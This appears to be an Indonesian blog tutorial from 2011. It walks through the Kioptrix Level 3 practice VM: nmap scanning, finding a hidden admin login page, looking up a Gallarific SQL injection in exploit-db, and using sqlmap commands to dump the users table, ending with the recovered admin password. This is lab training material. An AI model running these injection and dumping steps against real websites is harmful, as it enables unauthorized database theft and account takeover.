Searching...
November 12, 2011
Saturday, November 12, 2011

[KIOPTRIX LV3] Gaining User Password

Tutorial kali ini, saya akan menjelaskan tentang mendapatkan user name dan password pada sebuah website. Sebenarnya ngga konsen bikin tutorial ini, karena hari ini sedikit mengecewakan, dengan beberapa orang yang mengecewakan. Tapi setelah mandi, kepikiran untuk meneruskan karya-karya saya di dunia peretasan.

Ok, langsung saja ke tutorial.

Preparation:
  1. Nmap (bisa di dapatkan di sini)
  2. Internet browser (kali ini saya menggunakan chromium)
  3. Exploit db (bisa ditemukan di sini
  4. SQLmap (bisa didapatkan di sini)

Catatan:
  1. Semua tools ini bisa di dapatkan di <<back|track 5
  2. Untuk internet browser, kamu bisa menggunakan browser apapun.
  3. Dalam tutorial ini saya menggunakan OS <<back|track 5 GNOME 32 BIT
Briefing:
  1. Mapping Local Area Network
  2. Cari tau url halaman login
  3. Gunakan Exploit-db untuk mencari vulnerability website tersebut
  4. Gunakan SQLmap untuk melakukan proses SQL injection
  5. Game over
Walkthrough:
1. Mapping Local Area Network

Buka terminal, kemudian masukan perintah:
root@red-dragon:~# nmap -sn 192.168.1.0/24

Tetapkan target (kali ini target adalah kioptrix3.com

root@red-dragon:~# nmap -A 192.168.1.7



2. Cari tau url halaman login

Buka browser, kemudian tuju kioptrix3.com


Kemudian arahkan browser menuju kioptrix3.com/gallery/


Lihat source pada page tersebut, dan cari <!-- <a href="gadmin">Admin</a>&nbsp;&nbsp; -->


Mari kita coba, apakah halaman ini tersedia jika saya menambahkan "gadmin" (tanpa tanda petik).


Walaaaaa.. Saya berhasil mendapatkan halaman Log-In =)



3. Gunakan Exploit-db untuk mencari vulnerability website tersebut

Terlihat bahwa korban menggunakan Gallarific sebagai gallery managernya. Mari kita cari tau vulnerability yang dimiliki oleh gallarific.

Buka terminal, lalu masukan perintah:

root@red-dragon:~# cd /pentest/exploits/exploitdb/
kemudian
root@red-dragon:/pentest/exploits/exploitdb# grep -i gallarific files.csv

Ada 3 vulnerability yang dimikili oleh gallarific, kita akan mengambil fulnerability yang ke tiga. Yaitu "GALLARIFIC PHP Photo Gallery Script (gallery.php) SQL Injection". Masukan perintah:

root@red-dragon:/pentest/exploits/exploitdb# cat platforms/php/webapps/15891.txt


Terlihat bahwa target kita memiliki kelemahan pada url www.site.com/gallery.php?id=null


4. Gunakan SQLmap untuk melakukan proses SQL injection

Setelah mengetahui kelemahan target, sekarang saatnya melakukan SQL injection. Untuk mempercepat proses SQL ijection, saya menggunakan tools SQLmap yang sudah tersedia di <<back|track 5.

Buka terminal, lalu ketik:

root@red-dragon:/pentest/exploits/exploitdb# cd /pentest/database/sqlmap/

Penggunaan SQLmap tergolong mudah, formatnya adalah

root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u [vulnerable url]

Pada tahap 3 tiga sudah mengetahui letak vulnerable url korban kita terdapat pada /gallery.php?id=null. Maka kita hanya perlu menambahkan kioptrix3.com/gallery sebelum /gallery.php?id=null. Maka perintah sqlmap adalah:

root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u kioptrix3.com/gallery/gallery.php?id=null

Pada SQL injection ini, saya akan mencoba membongkar database target. Maka perintah sqlmap adalah:

root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u kioptrix3.com/gallery/gallery.php?id=null --dbs

Output:


Ada 3 database di sini:
  1. gallery
  2. information_schema
  3. mysql
Saya akan menggunakan database gallery, dan mencoba mencari tau tabel apa saja yang ada pada database gallery. Maka perintah sqlmap adalah:

root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u kioptrix3.com/gallery/gallery.php?id=null -D gallery --table

Output:

Ada 7 table yang terdapat pada database gallery:
  1. dev_accounts
  2. gallarific_comments
  3. gallarific_galleries
  4. gallarific_photos
  5. gallarific_settings
  6. gallarific_stat
  7. gallarific_users
Kemudian saya mencoba membongkar isi table pada gallarific_users. Maka perintah sqlmap adalah:

root@red-dragon:/pentest/database/sqlmap# python sqlmap.py -u kioptrix3.com/gallery/gallery.php?id=null -D gallery -T gallarific_users --dump


Banzaaaaaaaaai \(^o^)/
Kita sudak dapat user name dan password. Sekarang coba kita test. Dengan user name = admin, password = n0t7t1k4

 
Sekarang saya bisa melakukan apapun dengan website ini



Created by:
red-dragon








Thanks to : Yoshephine Handini for calm me down this morning.

0 comment:

Post a Comment

 
Back to top!